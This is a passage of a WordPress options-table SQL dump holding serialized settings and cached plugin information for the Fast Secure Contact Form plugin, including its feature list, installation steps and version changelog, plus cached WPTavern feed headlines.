padding-top:2px;\";s:19:\"captcha_div_style_m\";s:42:\"width:250px; height:65px; padding-top:2px;\";s:19:\"captcha_input_style\";s:38:\"text-align:left; margin:0; width:50px;\";s:16:\"submit_div_style\";s:33:\"text-align:left; padding-top:2px;\";s:12:\"button_style\";s:25:\"cursor:pointer; margin:0;\";s:11:\"reset_style\";s:25:\"cursor:pointer; margin:0;\";s:16:\"powered_by_style\";s:55:\"font-size:x-small; font-weight:normal; padding-top:5px;\";s:14:\"redirect_style\";s:16:\"text-align:left;\";s:10:\"field_size\";s:2:\"40\";s:18:\"captcha_field_size\";s:1:\"6\";s:9:\"text_cols\";s:2:\"30\";s:9:\"text_rows\";s:2:\"10\";s:13:\"aria_required\";s:5:\"false\";s:16:\"auto_fill_enable\";s:4:\"true\";s:12:\"title_border\";s:13:\"Contact Form:\";s:10:\"title_dept\";s:0:\"\";s:12:\"title_select\";s:0:\"\";s:10:\"title_name\";s:0:\"\";s:11:\"title_fname\";s:0:\"\";s:11:\"title_mname\";s:0:\"\";s:12:\"title_miname\";s:0:\"\";s:11:\"title_lname\";s:0:\"\";s:11:\"title_email\";s:0:\"\";s:12:\"title_email2\";s:0:\"\";s:17:\"title_email2_help\";s:0:\"\";s:10:\"title_subj\";s:0:\"\";s:10:\"title_mess\";s:0:\"\";s:10:\"title_capt\";s:0:\"\";s:12:\"title_submit\";s:0:\"\";s:11:\"title_reset\";s:0:\"\";s:16:\"title_areyousure\";s:0:\"\";s:17:\"text_message_sent\";s:0:\"\";s:16:\"tooltip_required\";s:0:\"\";s:15:\"tooltip_captcha\";s:0:\"\";s:13:\"tooltip_audio\";s:0:\"\";s:15:\"tooltip_refresh\";s:0:\"\";s:17:\"tooltip_filetypes\";s:0:\"\";s:16:\"tooltip_filesize\";s:0:\"\";s:12:\"enable_reset\";s:5:\"false\";s:18:\"enable_credit_link\";s:5:\"false\";s:20:\"error_contact_select\";s:0:\"\";s:10:\"error_name\";s:0:\"\";s:11:\"error_email\";s:0:\"\";s:12:\"error_email2\";s:0:\"\";s:11:\"error_field\";s:0:\"\";s:13:\"error_subject\";s:0:\"\";s:13:\"error_message\";s:0:\"\";s:11:\"error_input\";s:0:\"\";s:19:\"error_captcha_blank\";s:0:\"\";s:19:\"error_captcha_wrong\";s:0:\"\";s:13:\"error_correct\";s:0:\"\";s:13:\"error_spambot\";s:0:\"\";s:13:\"vcita_enabled\";s:5:\"false\";s:14:\"vcita_approved\";s:5:\"false\";s:9:\"vcita_uid\";s:0:\"\";s:11:\"vcita_email\";s:0:\"\";s:20:\"vcita_confirm_tokens\";s:0:\"\";s:17:\"vcita_initialized\";s:5:\"false\";s:16:\"vcita_first_name\";s:0:\"\";s:15:\"vcita_last_name\";s:0:\"\";s:17:\"ex_field1_default\";s:1:\"0\";s:22:\"ex_field1_default_text\";s:0:\"\";s:13:\"ex_field1_req\";s:5:\"false\";s:15:\"ex_field1_label\";s:0:\"\";s:14:\"ex_field1_type\";s:4:\"text\";s:17:\"ex_field1_max_len\";s:0:\"\";s:19:\"ex_field1_label_css\";s:0:\"\";s:19:\"ex_field1_input_css\";s:0:\"\";s:20:\"ex_field1_attributes\";s:0:\"\";s:15:\"ex_field1_regex\";s:0:\"\";s:21:\"ex_field1_regex_error\";s:0:\"\";s:15:\"ex_field1_notes\";s:0:\"\";s:21:\"ex_field1_notes_after\";s:0:\"\";s:17:\"ex_field2_default\";s:1:\"0\";s:22:\"ex_field2_default_text\";s:0:\"\";s:13:\"ex_field2_req\";s:5:\"false\";s:15:\"ex_field2_label\";s:0:\"\";s:14:\"ex_field2_type\";s:4:\"text\";s:17:\"ex_field2_max_len\";s:0:\"\";s:19:\"ex_field2_label_css\";s:0:\"\";s:19:\"ex_field2_input_css\";s:0:\"\";s:20:\"ex_field2_attributes\";s:0:\"\";s:15:\"ex_field2_regex\";s:0:\"\";s:21:\"ex_field2_regex_error\";s:0:\"\";s:15:\"ex_field2_notes\";s:0:\"\";s:21:\"ex_field2_notes_after\";s:0:\"\";s:17:\"ex_field3_default\";s:1:\"0\";s:22:\"ex_field3_default_text\";s:0:\"\";s:13:\"ex_field3_req\";s:5:\"false\";s:15:\"ex_field3_label\";s:0:\"\";s:14:\"ex_field3_type\";s:4:\"text\";s:17:\"ex_field3_max_len\";s:0:\"\";s:19:\"ex_field3_label_css\";s:0:\"\";s:19:\"ex_field3_input_css\";s:0:\"\";s:20:\"ex_field3_attributes\";s:0:\"\";s:15:\"ex_field3_regex\";s:0:\"\";s:21:\"ex_field3_regex_error\";s:0:\"\";s:15:\"ex_field3_notes\";s:0:\"\";s:21:\"ex_field3_notes_after\";s:0:\"\";s:17:\"ex_field4_default\";s:1:\"0\";s:22:\"ex_field4_default_text\";s:0:\"\";s:13:\"ex_field4_req\";s:5:\"false\";s:15:\"ex_field4_label\";s:0:\"\";s:14:\"ex_field4_type\";s:4:\"text\";s:17:\"ex_field4_max_len\";s:0:\"\";s:19:\"ex_field4_label_css\";s:0:\"\";s:19:\"ex_field4_input_css\";s:0:\"\";s:20:\"ex_field4_attributes\";s:0:\"\";s:15:\"ex_field4_regex\";s:0:\"\";s:21:\"ex_field4_regex_error\";s:0:\"\";s:15:\"ex_field4_notes\";s:0:\"\";s:21:\"ex_field4_notes_after\";s:0:\"\";}','yes'),(753,'_transient_timeout_feed_mod_867bd5c64f85878d03a060509cd2f92c','1423563974','no'),(754,'_transient_feed_mod_867bd5c64f85878d03a060509cd2f92c','1423520774','no'),(755,'_transient_timeout_dash_aa95765b5cc111c56d5993d476b1c2f0','1423563974','no'),(756,'_transient_dash_aa95765b5cc111c56d5993d476b1c2f0','<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'http://wptavern.com/github-updater-4-1-to-add-remote-installation-for-wordpress-plugins-and-themes\' title=\'GitHub Updater is a plugin that developers often use to enable automatic updates to GitHub or Bitbucket-hosted WordPress plugins and themes. The project was started in July 2013 by Andy Fragen, a trauma surgeon and plugin developer. Over the past two years GitHub Updater has received improvements from 14 contributors. Fragen’s work on GitHub Updater makes it […]\'>WPTavern: GitHub Updater 4.1 to Add Remote Installation for WordPress Plugins and Themes</a></li><li><a class=\'rsswidget\' href=\'http://wptavern.com/wp-rocket-grows-from-0-to-35k-in-monthly-revenue\' title=\'WP Media, the company behind WordPress caching plugin WP Rocket, published a post that highlights how successful the plugin has been since launching a year and a half ago. When we wrote about the international launch of WP Rocket, we questioned whether it would be able to compete against all of the free, robust options available. In a show of transparency, W […]\'>WPTavern: WP Rocket Grows From $0 to $35K in Monthly Revenue</a></li><li><a class=\'rsswidget\' href=\'http://wptavern.com/the-first-conference-dedicated-to-wordpress-com-debuts-on-march-28th-in-portland-or\' title=\'photo credit: Publish Akku – (license) Those who use the self hosted version of WordPress have access to WordCamps, annual conferences dedicated to WordPress. Meanwhile, there has never been a conference focused on WordPress.com. Press Publish is a new series of events focused on WordPress.com and Jetpack. The first is scheduled for March 28th, 2015 in Portl […]\'>WPTavern: The First Conference Dedicated to WordPress.com Debuts on March 28th in Portland, OR</a></li><li><a class=\'rsswidget\' href=\'http://wptavern.com/initiative-aims-to-improve-the-new-user-experience-in-wordpress-4-2\' title=\'photo credit: zu.com – Image136 – (license) Drew Jaynes, who is leading the release cycle for WordPress 4.2 announced on the Make.WordPress.core blog, that a new community initiative has been launched called NUX or New User Experience. The group is made up of more than 15 members of the WordPress community who have experience in onboarding clients, training […]\'>WPTavern: Initiative Aims to Improve the New User Experience in WordPress 4.2</a></li><li><a class=\'rsswidget\' href=\'http://ma.tt/2015/02/fusion-net/\' title=\'There’s a relatively new site called Fusion.net that is definitely worth checking out, it’s already full of great articles and they’re starting to climb up the Techmeme Leaderboard. They run on WordPress.com VIP. […]\'>Matt: Fusion.net</a></li></ul></div>','no'),(359,'_transient_timeout_si_contact_form_info','1370540251','no'),(360,'_transient_si_contact_form_info','O:8:\"stdClass\":18:{s:4:\"name\";s:24:\"Fast Secure Contact Form\";s:4:\"slug\";s:15:\"si-contact-form\";s:7:\"version\";s:7:\"3.1.8.2\";s:6:\"author\";s:72:\"<a href=\"http://www.642weather.com/weather/scripts.php\">Mike Challis</a>\";s:14:\"author_profile\";s:41:\"http://profiles.wordpress.org/mikechallis\";s:12:\"contributors\";a:1:{s:12:\"Mike Challis\";s:41:\"http://profiles.wordpress.org/mikechallis\";}s:8:\"requires\";s:5:\"3.4.2\";s:6:\"tested\";s:5:\"3.5.1\";s:13:\"compatibility\";a:1:{s:5:\"3.5.1\";a:5:{s:7:\"3.1.7.2\";a:3:{i:0;i:100;i:1;i:1;i:2;i:1;}s:7:\"3.1.7.3\";a:3:{i:0;i:100;i:1;i:3;i:2;i:3;}s:5:\"3.1.8\";a:3:{i:0;i:75;i:1;i:4;i:2;i:3;}s:7:\"3.1.8.1\";a:3:{i:0;i:83;i:1;i:23;i:2;i:19;}s:7:\"3.1.8.2\";a:3:{i:0;i:71;i:1;i:24;i:2;i:17;}}}s:6:\"rating\";d:89.399999999999991;s:11:\"num_ratings\";i:1395;s:10:\"downloaded\";i:3651622;s:12:\"last_updated\";s:10:\"2013-06-01\";s:5:\"added\";s:10:\"2009-08-27\";s:8:\"homepage\";s:37:\"http://www.FastSecureContactForm.com/\";s:8:\"sections\";a:5:{s:11:\"description\";s:6190:\"<p>This plugin allows a webmaster to easily create and add contact forms to WordPress. The contact form will let the user send emails to a site\'s admin, and also send a meeting request to talk over phone or video. An administration panel is present, where the webmaster can create and preview unlimited forms.</p>\n\n<p>Features: easy form edit, multiple forms, confirmation emails, no templates to mess with, and an option to redirect visitors to any URL after the message is sent. Includes CAPTCHA and Akismet support to block spammers. Spam is no longer a problem. You can add extra fields of any type: text, textarea, checkbox, checkbox-multiple, radio, select, select-multiple, attachment, date, time, hidden, password, and fieldset.</p>\n\n<ul>\n<li><a href=\"http://www.fastsecurecontactform.com/\">FastSecureContactForm.com</a></li>\n<li><a href=\"http://downloads.wordpress.org/plugin/si-contact-form.zip\">Download WordPress Plugin Version</a></li>\n<li><a href=\"http://www.fastsecurecontactform.com/download-php-script\">Download PHP Script Version</a></li>\n</ul>\n\n<h4>Help Keep This Plugin Free</h4>\n\n<p>If you find this plugin useful to you, please consider <a href=\"http://www.fastsecurecontactform.com/donate\"><strong>making a small donation</strong></a> to help contribute to my time invested and to further development. Thanks for your kind support! - <a href=\"http://profiles.wordpress.org/users/MikeChallis/\"><strong>Mike Challis</strong></a></p>\n\n<h4>Good news! A major update is being worked on</h4>\n\n<p>The Fast Secure Contact Form 4.0 project began in late August 2012 and is making great progress. Read about the changes here:\n<a href=\"http://wordpress.org/support/topic/fast-secure-contact-form-40-project-reports\">Fast Secure Contact Form 4.0 project reports</a>. \nHow you can help with the new 4.0 verion: <a href=\"http://www.fastsecurecontactform.com/donate\">Donate to the project</a>, and/or contribute your ideas in the <a href=\"http://wordpress.org/support/topic/working-on-a-40-version\">Working on a 4.0 Version</a> post.</p>\n\nFeatures:\n\n<ul>\n<li>Super easy customizable Options from Admin settings page.</li>\n<li>Multi-Form feature that allows you to have as many different forms as you need.<a href=\"http://www.fastsecurecontactform.com/multiple-e-mail-recipients\">See FAQ</a></li>\n<li>Optional extra fields of any type: text, textarea, checkbox, checkbox-multiple, radio, select, select-multiple, attachment, date, time, hidden, password, fieldset(box). <a href=\"http://www.fastsecurecontactform.com/how-to-add-extra-fields\">See FAQ</a></li>\n<li>File attachments are supported, see here for details: <a href=\"http://wordpress.org/support/topic/416371\" rel=\"nofollow\">http://wordpress.org/support/topic/416371</a></li>\n<li>Backup/restore tool. You can backup/restore all your forms or single forms and settings.<a href=\"http://www.fastsecurecontactform.com/backup-restore-forms\">See FAQ</a></li>\n<li>Easy to hide subject and message fields for use as a newsletter signup.</li>\n<li>Supports sending mail to multiple departments.<a href=\"http://www.fastsecurecontactform.com/tip-form-preview\">See FAQ</a></li>\n<li>Optional - redirect to any URL after message sent.</li>\n<li>Optional - posted data can be sent as a query string on the redirect URL. <a href=\"http://www.fastsecurecontactform.com/sending-data-by-query-string\">See faq</a></li>\n<li>Optional - confirmation E-mail message.<a href=\"http://www.fastsecurecontactform.com/tip-add-email-autoresponder\">See FAQ</a></li>\n<li>Valid coding for HTML, XHTML, HTML STRICT, Section 508, and WAI Accessibility.</li>\n<li>Uses simple inline error messages.</li>\n<li>Reloads form data and warns user if user forgets to fill out a field.</li>\n<li>Validates syntax of E-mail address.</li>\n<li>CAPTCHA can be turned off or hidden from logged in users and or admins.</li>\n<li>Multi \"E-mail to\" contact support.</li>\n<li>Auto form fill for logged in users.</li>\n<li>Customizable form field titles.</li>\n<li>Customizable CSS style.</li>\n<li>Sends E-mail with UTF-8 character encoding for US and International character support.</li>\n<li>Pre-fill in form fields from a URL query string. <a href=\"http://www.fastsecurecontactform.com/query-string-parameters\">See FAQ</a></li>\n<li>Save emails to the WordPress database, or export to CSV or Excel. <a href=\"http://www.fastsecurecontactform.com/save-to-database\">See FAQ</a></li>\n<li>I18n language translation support. <a href=\"http://www.fastsecurecontactform.com/how-to-translate\">See FAQ</a></li>\n</ul>\n\nScheduling, Meeting and Payments via vCita:\n\n<ul>\n<li>Offer visitors to Schedule Meetings as part of your Contact Form</li>\n<li>Set your availability and synchronize your contact form with your Google calendar</li>\n<li>Meet online with web-based video meeting room</li>\n<li>Meet over phone conference</li>\n<li>Record your meetings</li>\n<li>Collect payments and bill for your time and services</li>\n<li>Send a payment request once a meeting is completed or secure a fee in advance according to your hourly rate</li>\n</ul>\n\nSecurity:\n\n<ul>\n<li>Akismet spam protection support.</li>\n<li>Spam checks E-mail address input from common spammer tactics...\nprevents spammer forcing to:, cc:, bcc:, newlines, and other E-mail injection attempts to spam the world.</li>\n<li>Makes sure the contact form was posted from your blog domain name only.</li>\n<li>Filters all form inputs from HTML and other nasties.</li>\n<li>E-mail message footer shows blog username(if logged on), Date/Time timestamp, IP address, and user agent (browser version) of user who contacted you.</li>\n</ul>\n\nCAPTCHA Image Support:\n\n<ul>\n<li>Uses Open-source free PHP CAPTCHA library by <a href=\"http://www.phpcaptcha.org\" rel=\"nofollow\">http://www.phpcaptcha.org</a> (customized version included)</li>\n<li>Abstract background with multi colored, angled, and transparent text</li>\n<li>Arched lines through text</li>\n<li>Refresh button to reload CAPTCHA</li>\n<li>CAPTCHA can be disabled on form edit page</li>\n</ul>\n\nRequirements/Restrictions:\n\n<ul>\n<li>Works with Wordpress 3.4.2+ and WPMU (Wordpress 3.5+ is highly recommended)</li>\n<li>PHP5 </li>\n<li>PHP register_globals and safe_mode MUST be set to \"Off\".</li>\n</ul>\";s:12:\"installation\";s:1228:\"<ol>\n<li><p>Install automatically through the <code>Plugins</code>, <code>Add New</code> menu in WordPress, or upload the <code>si-contact-form</code> folder to the <code>/wp-content/plugins/</code> directory.</p></li>\n<li><p>Activate the plugin through the <code>Plugins</code> menu in WordPress. Look for the Settings link to configure the Options.</p></li>\n<li><p>Add the shortcode <code>[si-contact-form form=\'1\']</code> in a Page, Post, or Text Widget. Here is how: Log into your blog admin dashboard. Click <code>Pages</code>, click <code>Add New</code>, add a title to your page, enter the shortcode <code>[si-contact-form form=\'1\']</code> in the page, uncheck <code>Allow Comments</code>, click <code>Publish</code>.</p></li>\n<li><p>Test an email from your form.</p></li>\n<li><p>Updates are automatic. Click on \"Upgrade Automatically\" if prompted from the admin menu. If you ever have to manually upgrade, simply deactivate, uninstall, and repeat the installation steps with the new version.</p></li>\n</ol>\n\n<h4>I just installed this and do not get any email from it, what could be wrong?</h4>\n\n<p><a href=\"http://www.fastsecurecontactform.com/email-does-not-send\">See FAQ page: How to troubleshoot mail delivery</a></p>\";s:11:\"screenshots\";s:1543:\"<ol>\n <li>\n <a href=\'http://s.wordpress.org/extend/plugins/si-contact-form/screenshot-1.gif?r=0\' title=\'Click to view full-size screenshot 1\'><img class=\'screenshot\' src=\'http://s.wordpress.org/extend/plugins/si-contact-form/screenshot-1.gif?r=0\' alt=\'si-contact-form screenshot 1\' /></a>\n <p><p>screenshot-1.gif is the contact form.</p></p>\n </li>\n <li>\n <a href=\'http://s.wordpress.org/extend/plugins/si-contact-form/screenshot-2.gif?r=0\' title=\'Click to view full-size screenshot 2\'><img class=\'screenshot\' src=\'http://s.wordpress.org/extend/plugins/si-contact-form/screenshot-2.gif?r=0\' alt=\'si-contact-form screenshot 2\' /></a>\n <p><p>screenshot-2.gif is the contact form showing the inline error messages.</p></p>\n </li>\n <li>\n <a href=\'http://s.wordpress.org/extend/plugins/si-contact-form/screenshot-3.gif?r=0\' title=\'Click to view full-size screenshot 3\'><img class=\'screenshot\' src=\'http://s.wordpress.org/extend/plugins/si-contact-form/screenshot-3.gif?r=0\' alt=\'si-contact-form screenshot 3\' /></a>\n <p><p>screenshot-3.gif is the <code>Contact Form options</code> tab on the <code>Admin Plugins</code> page.</p></p>\n </li>\n <li>\n <a href=\'http://s.wordpress.org/extend/plugins/si-contact-form/screenshot-4.gif?r=0\' title=\'Click to view full-size screenshot 4\'><img class=\'screenshot\' src=\'http://s.wordpress.org/extend/plugins/si-contact-form/screenshot-4.gif?r=0\' alt=\'si-contact-form screenshot 4\' /></a>\n <p><p>screenshot-4.gif adding the shortcode <code>[si-contact-form form=\'1\']</code> in a Page.</p></p>\n </li>\n</ol>\";s:9:\"changelog\";s:49320:\"<h4>3.1.8.2</h4>\n\n<ul>\n<li>(01 Apr 2013) - switched back to PHP sessions because WP Sessions had issues with cache plugins.</li>\n<li>Fixed some forms sometimes blanked on Submit.</li>\n<li>Fixed error logic for attachment permissions.</li>\n<li>Fixed form posting issues caused by cached pages and session timeout issues.</li>\n<li>Fixed sometimes missing values for select-multiple field type.</li>\n<li>Fixed CAPTCHA did not work on some servers.</li>\n<li>Fixed sometimes error in backup tool.</li>\n</ul>\n\n<h4>3.1.8.1</h4>\n\n<ul>\n<li>(02 Feb 2013) - Fixed multiple forms on same page was broken.</li>\n<li>fixed ReferenceError: VC_FSCF_set_cookie is not defined.</li>\n</ul>\n\n<h4>3.1.8</h4>\n\n<ul>\n<li>(30 Jan 2013) - removed PHP sessions and replaced with a built-in WP session method: WP Session Manager by Eric Mann.</li>\n<li>added border formatting of HTML email where it displays user info.</li>\n</ul>\n\n<h4>3.1.7.3</h4>\n\n<ul>\n<li>(27 Jan 2013) - fix passing Passing query string parameters to contact form page feature.</li>\n<li>fix Notice: Undefined variable: ctf_redirect_enable.</li>\n<li>change to securimage_ctf class name for CAPTCHA.</li>\n</ul>\n\n<h4>3.1.7.2</h4>\n\n<ul>\n<li>(19 Jan 2013) - fix a parse error when akismet is enabled.</li>\n<li>fix error when the form is called from PHP shortcode method.</li>\n<li>display a more helpful error when checkbox is not configured properly.</li>\n</ul>\n\n<h4>3.1.7.1</h4>\n\n<ul>\n<li>(18 Jan 2013) - fix a few critical errors such as \"illegal characters in POST\", Notice: Undefined index si-contact-form.php on line 1016, and users cannot send the form a 2nd time.</li>\n</ul>\n\n<h4>3.1.7</h4>\n\n<ul>\n<li>(17 Jan 2013) - major fix for compatibility with JetPack, SFC Like, and other plugins that modify \"The content\".</li>\n<li>fixed all \"Could not read CAPTCHA token file\" errors.</li>\n<li>fixed redirect not working when other plugins modify \"The content\".</li>\n<li>fixed \"Your message has been sent\" message not displaying when other plugins modify \"The content\".</li>\n<li>fixed vCita cookie was setting even if vCita is disabled.</li>\n<li>fixed some false \"Invalid Input\" errors on form input sanitization.</li>\n<li>PHP sessions are utilized and required now.</li>\n<li>removed the CAPTCHA temp folder since PHP sessions are always used now.</li>\n<li>PHP session cookie now uses HTTPOnly mode for better security (PHP 5.2.0 and up) </li>\n<li>added click back button and send again prevention trap, when you try to do that, it will show a blank form.</li>\n<li>changed message sent redirect from javascript to meta refresh in HTML header.</li>\n<li>removed the last of the CAPTCHA audio code.</li>\n<li>removed the setting \"Use captcha without PHP session\".</li>\n<li>other bug fixes.</li>\n</ul>\n\n<h4>3.1.6.3</h4>\n\n<ul>\n<li>(09 Jan 2013) - fixed message sent HTML when redirect is disabled.</li>\n</ul>\n\n<h4>3.1.6.2</h4>\n\n<ul>\n<li>(08 Jan 2013) - fixed redirect query vars bug caused by 3.1.6.1</li>\n<li>fixed a couple PHP errors caused by 3.1.6.1</li>\n<li>fixed some field labels had a semicolon outside of the translatable text.</li>\n<li>fixed styles left required indicator alignment.</li>\n<li>fixed to allow HTML in \"Required field indicator\" setting.</li>\n<li>added redirect message is inside a border when form border is enabled.</li>\n<li>added new setting \"CSS style for redirecting message\".</li>\n<li>added more help links for css settings on form edit page.</li>\n<li>required field indicators are now styled by the setting \"CSS style for required field text\", so now it controls both the message and the indicators the same.</li>\n</ul>\n\n<h4>3.1.6.1</h4>\n\n<ul>\n<li>(06 Jan 2013) - added new setting \"Enable honeypot spambot trap\". Enables empty field and time based honyepot traps for spam bots. For best results, do not enable unless you have a spam bot problem. Does not stop human spammers, Akismet should be enabled for that.</li>\n<li>Many security improvements and code cleanup.</li>\n<li>Autoresponder email is renamed to Confirmation email.</li>\n<li>Border label can now be disabled by deleting the \"Border label\" setting.</li>\n<li>Removed geekmail mail send function, you can still use WordPress or PHP.</li>\n<li>Email field is now type=text instead of type=email because too many themes did not style for it. Version 4.0 will have an option to select this.</li>\n</ul>\n\n<h4>3.1.6</h4>\n\n<ul>\n<li>(23 Dec 2012) - fix form action URL is now compatible with qtranslate plugin with multi-lingual pages, so the correct /de/ /en/ language url is used.</li>\n<li>fixed checkbox-multiple alignment issue on some themes. </li>\n</ul>\n\n<h4>3.1.5.8</h4>\n\n<ul>\n<li>(11 Dec 2012) - added announcement about the Fast Secure Contact Form 4.0 project.</li>\n</ul>\n\n<h4>3.1.5.7</h4>\n\n<ul>\n<li>(04 Dec 2012) - Fix uninitialized error on vCita code. </li>\n<li>Powered by link will open in new window. </li>\n<li>Added support for Fast Secure Contact Form Newsletter plugin addon.</li>\n<li>Use correct comment_type = contact-form for Akismet API call.</li>\n<li>Improve visual style of rating stars. </li>\n</ul>\n\n<h4>3.1.5.6</h4>\n\n<ul>\n<li>(03 Nov 2012) - Fix HTML entity problem in multiple email list. </li>\n</ul>\n\n<h4>3.1.5.5</h4>\n\n<ul>\n<li>(06 Aug 2012) - Fix so permissions of the captcha temp folder is not changed.</li>\n</ul>\n\n<h4>3.1.5.4</h4>\n\n<ul>\n<li>(12 May 2012) - Better detection of checkbox config errors.</li>\n</ul>\n\n<h4>3.1.5.3</h4>\n\n<ul>\n<li>(11 Apr 2012) - vCita message dismiss feature.</li>\n<li>put # for the redirect URL and it will redirect to the same page the form is on regardless of the page.</li>\n</ul>\n\n<h4>3.1.5.2</h4>\n\n<ul>\n<li>(02 Apr 2012) - Fixed hidden shortcode settings broken since version 3.1.5</li>\n</ul>\n\n<h4>3.1.5.1</h4>\n\n<ul>\n<li>(20 Mar 2012) - removed message \"You still haven\'t completed your Meeting Scheduler settings.\" on admin pages.</li>\n</ul>\n\n<h4>3.1.5</h4>\n\n<ul>\n<li>(20 Mar 2012) - vCita improved so your email address is not sent to VCita unless you type it in yourself when activating the service.</li>\n<li>Email parameter removed from vCita banner URL.</li>\n<li>Added shortcode setting to show Form Page URL in the email message [si-contact-form form=\'1\' hidden=\'form_page=1\']</li>\n</ul>\n\n<h4>3.1.4.1</h4>\n\n<ul>\n<li>(24 Feb 2012) - Email will only be passed to vCita servers when you choose to enable vCita services. </li>\n</ul>\n\n<h4>3.1.4</h4>\n\n<ul>\n<li>(23 Feb 2012) - Fix bug in Extra field tags can be used in subject setting.</li>\n<li>Fix possible error: preg_match() expects parameter to be string. </li>\n<li>Fix to use separate CC: email header.</li>\n<li>vCita improvements.</li>\n<li>Updated Russian (ru_RU) - Translated by <a href=\"http://www.iflexion.com/\">Iflexion</a></li>\n</ul>\n\n<h4>3.1.3.1</h4>\n\n<ul>\n<li>(05 Feb 2012) - Fix vCita had some uninitialized variable errors when debugging is on.</li>\n</ul>\n\n<h4>3.1.3</h4>\n\n<ul>\n<li>(04 Feb 2012) - Extra field tags can be used in subject setting. For available field tags, click \'help\' next to the \'E-mail Subject Prefix:\' setting.</li>\n<li>Fix vCita could not be disabled during invalid email condition.</li>\n<li>Fix JS on form edit preview page.</li>\n</ul>\n\n<h4>3.1.2</h4>\n\n<ul>\n<li>(25 Jan 2012) - Use WP function is_ssl() for better SSL compatibility.</li>\n<li>Fix vCita \'JS on every page\' bug in admin and WP site.</li>\n<li>Fix vCita had some output when disabled.</li>\n<li>Fix calendar week number bug.</li>\n</ul>\n\n<h4>3.1.1</h4>\n\n<ul>\n<li>(21 Jan 2012) - Updated vCita functions and added new schedule a meeting buttons. </li>\n<li>Replace the use of WP_PLUGIN_URL with plugins_url() for better SSL compatibility.</li>\n<li>Updated Italian language (it_IT) - Translated by <a href=\"http://gidibao.net/\" title=\"Gianni Diurno\">Gianni Diurno</a></li>\n</ul>\n\n<h4>3.1</h4>\n\n<ul>\n<li>(06 Dec 2011) - Add \"Set a meeting\" option to your contact form using vCita Meeting Scheduler. Meet users over video or phone, and collect payment for services.</li>\n<li>Improved HTML code on message sent.</li>\n</ul>\n\n<h4>3.0.5</h4>\n\n<ul>\n<li>(18 Nov 2011) - Harden security for CAPTCHA by limiting the number of created cache files. This condition could only be realized with a script. Found by <a href=\"http://bstpierre.org/\">Brian St. Pierre</a>.</li>\n<li>HTML validation fix, added unique id for submit and reset buttons.</li>\n</ul>\n\n<h4>3.0.4</h4>\n\n<ul>\n<li>(09 Oct 2011) - Fix default text could not be 0.</li>\n<li>Fix HTML validation with date field.</li>\n<li>Fix rows and cols extra field attributes.</li>\n<li>Fix javascript console error on date calendar popup.</li>\n</ul>\n\n<h4>3.0.3.2</h4>\n\n<ul>\n<li>(27 Jul 2011) - Fixed medium XSS HTB23036 - as advised by High-Tech Bridge SA Security Research Lab.</li>\n<li>Fix, added missing 00 to 24 hour time select.</li>\n</ul>\n\n<h4>3.0.3.1</h4>\n\n<ul>\n<li>(05 Jul 2011) - Tested / fixed to be compatible with WP 3.2</li>\n<li>Fix for <code>&apos</code> entity showing for single quotes on IE7, IE8</li>\n<li>Fix for CAPTCHA input field out of position on IE7 with labels left CSS setting.</li>\n</ul>\n\n<h4>3.0.3</h4>\n\n<ul>\n<li>(16 Jun 2011) - Tested compatible with WP 3.2 Beta 2</li>\n<li>\"Number of available extra fields\" setting is now for each form # instead of all forms.</li>\n<li>CAPTCHA audio feature removed.</li>\n<li>Misc. admin Fixes.</li>\n<li>Another fix for empty autoresponder field tags were showing.</li>\n<li>Calendar style improvements.</li>\n</ul>\n\n<h4>3.0.2</h4>\n\n<ul>\n<li>(08 Jun 2011) - Fixed error: Undefined variable: securimage_url </li>\n<li>Added id tags to submit and reset buttons.</li>\n<li>Updated Italian language (it_IT) - Translated by <a href=\"http://gidibao.net/\" title=\"Gianni Diurno\">Gianni Diurno</a></li>\n</ul>\n\n<h4>3.0.1</h4>\n\n<ul>\n<li>(02 Jun 2011) - CAPTCHA Audio feature is disabled by Mike Challis until further notice because a proof of concept code CAPTCHA solving exploit was released - Security Advisory - SOS-11-007. CAPTCHA image is not involved.</li>\n<li>Security enhancements for possible low level XSS exploit in admin settings: thanks to <a href=\"http://secu.boiteaweb.fr/\">Julio Potier</a>.</li>\n<li>Fix javascript error when CAPTCHA audio is disabled.</li>\n<li>Fixed missing width/height attributes for CAPTCHA images.</li>\n<li>Fixed backslash problem on Restore Settings tool.</li>\n<li>Fixed empty autoresponder field tags were showing.</li>\n<li>Fixed various style improvements for admin error messages.</li>\n<li>Added a popup alert for when changing the number of forms or extra fields.</li>\n<li>Added setting: CSS style for CAPTCHA input field on the contact form.</li>\n<li>Added Norwegian Bokmal (nb_NO) - Translated by <a href=\"http://punktlig-ikt.no\">Tore Johnny Bratveit</a></li>\n</ul>\n\n<h4>3.0</h4>\n\n<ul>\n<li>(25 Apr 2011) - Added (extra fields) default text can be set for text or textarea.</li>\n<li>Added (extra fields) max length can be set for password, text or textarea.</li>\n<li>Added (extra fields) attributes can be set for password, text or textarea.</li>\n<li>Added (extra fields) validation regex can be set for password, text or textarea.</li>\n<li>Added (extra fields) validation regex fail message can be set for password, text or textarea.</li>\n<li>Added (extra fields) label or input CSS can be set individually for any extra field.</li>\n<li>Added (extra fields) HTML before and after can be set.</li>\n<li>Added (extra fields) \'email\' extra field type with validation.</li>\n<li>Added (extra fields) \'url\' extra field type with validation.</li>\n<li>Added (extra fields) first option of select field type can be in brackets to indicate [Please select].</li>\n<li>Added \'email\' field pulls up proper keyboard on iphone/ipad.</li>\n<li>Added optional [form_label] tag for subject. </li>\n<li>Added time format option for \'time\' extra field (select 12 or 24 hour).</li>\n<li>Improved extra fields admin GUI.</li>\n<li>Added Field labels are bold when HTML email is enabled.</li>\n<li>Fix - trim spaces on extra field multiple options.</li>\n<li>Fix - attached field allowed types separated by spaces.</li>\n<li>Fix - bug in restore tool that could cause data loss.</li>\n<li>Email validate DNS check disabled by default because some servers have big delay.</li>\n</ul>\n\n<h4>2.9.8.6</h4>\n\n<ul>\n<li>(27 Mar 2011) - Fix HTML notes would not appear before a fieldset open.</li>\n<li>Fix horizontal display feature for radio and multiple checkbox after post.</li>\n<li>Fixed date calender on some themes by adding a high z-index to the CSS.</li>\n<li>Added ability to use comma in \"Email To:\" name. If you need to use a comma besides the one needed to separate the name and email, escape it with a back slash, like this: \\,</li>\n<li>Added ability to specify cc and bcc in \"Email To:\". Example: Webmaster,user1@example.com;[cc]user2@example.com;[bcc]user3@example.com</li>\n<li>Added more WordPress logged in user details to the email message footer.</li>\n<li>Added optional \"Are you sure?\" form submit popup message (message can also be changed).</li>\n<li>Added Arabic (ar) partial translation - Translated by Jasmine Hassan</li>\n</ul>\n\n<h4>2.9.8.5</h4>\n\n<ul>\n<li>(08 Mar 2011) - Improved required date 